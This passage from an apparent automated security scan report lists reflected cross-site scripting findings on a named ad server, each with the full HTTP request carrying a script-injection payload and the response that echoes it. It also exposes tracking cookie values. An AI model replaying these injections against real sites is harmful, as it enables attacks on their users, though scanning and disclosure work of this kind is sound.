Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:40:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/526055400/x71fdced"><script>alert(1)</script>cd9f8b1c148/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC
...[SNIP]...

4.191. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b07e"><script>alert(1)</script>4c5c59de13c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB31b07e"><script>alert(1)</script>4c5c59de13c/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB31b07e"><script>alert(1)</script>4c5c59de13c/ATTWL/11Q1/MobRON/300/1[timestamp]/362496024/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.192. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83be"><script>alert(1)</script>51bef4a3ae4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWLa83be"><script>alert(1)</script>51bef4a3ae4/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWLa83be"><script>alert(1)</script>51bef4a3ae4/11Q1/MobRON/300/1[timestamp]/1242839644/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.193. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd03"><script>alert(1)</script>7b8086e554f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q14cd03"><script>alert(1)</script>7b8086e554f/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q14cd03"><script>alert(1)</script>7b8086e554f/MobRON/300/1[timestamp]/557312855/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.194. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b5f"><script>alert(1)</script>adf8fbdc8c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRONd0b5f"><script>alert(1)</script>adf8fbdc8c0/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRONd0b5f"><script>alert(1)</script>adf8fbdc8c0/300/1[timestamp]/1193233704/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.195. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302ac"><script>alert(1)</script>aecd486426b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300302ac"><script>alert(1)</script>aecd486426b/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300302ac"><script>alert(1)</script>aecd486426b/1[timestamp]/701616580/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.196. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb20"><script>alert(1)</script>2288154c82a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90bbb20"><script>alert(1)</script>2288154c82a HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/1294161343/x90bbb20"><script>alert(1)</script>2288154c82a/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.197. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1253d"><script>alert(1)</script>f83c851237 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB31253d"><script>alert(1)</script>f83c851237/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB31253d"><script>alert(1)</script>f83c851237/ATTWL/11Q1/MobRON/300/1[timestamp]/359802447/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.198. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e40f"><script>alert(1)</script>1047b7427bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL3e40f"><script>alert(1)</script>1047b7427bb/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 360
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL3e40f"><script>alert(1)</script>1047b7427bb/11Q1/MobRON/300/1[timestamp]/1639352866/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.199. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a24a"><script>alert(1)</script>02370102126 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q11a24a"><script>alert(1)</script>02370102126/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 360
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q11a24a"><script>alert(1)</script>02370102126/MobRON/300/1[timestamp]/1717528415/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.200. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d49e8"><script>alert(1)</script>4b4cd2b3892 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRONd49e8"><script>alert(1)</script>4b4cd2b3892/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 360
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRONd49e8"><script>alert(1)</script>4b4cd2b3892/300/1[timestamp]/1950911831/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.201. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e10"><script>alert(1)</script>116c0e64645 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/30092e10"><script>alert(1)</script>116c0e64645/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/30092e10"><script>alert(1)</script>116c0e64645/1[timestamp]/603584026/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.202. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427e3"><script>alert(1)</script>c963c08b509 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90427e3"><script>alert(1)</script>c963c08b509/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/985159134/x90427e3"><script>alert(1)</script>c963c08b509//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.203. http://base.liveperson.net/hc/5296924/cmd/url/ [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://base.liveperson.net
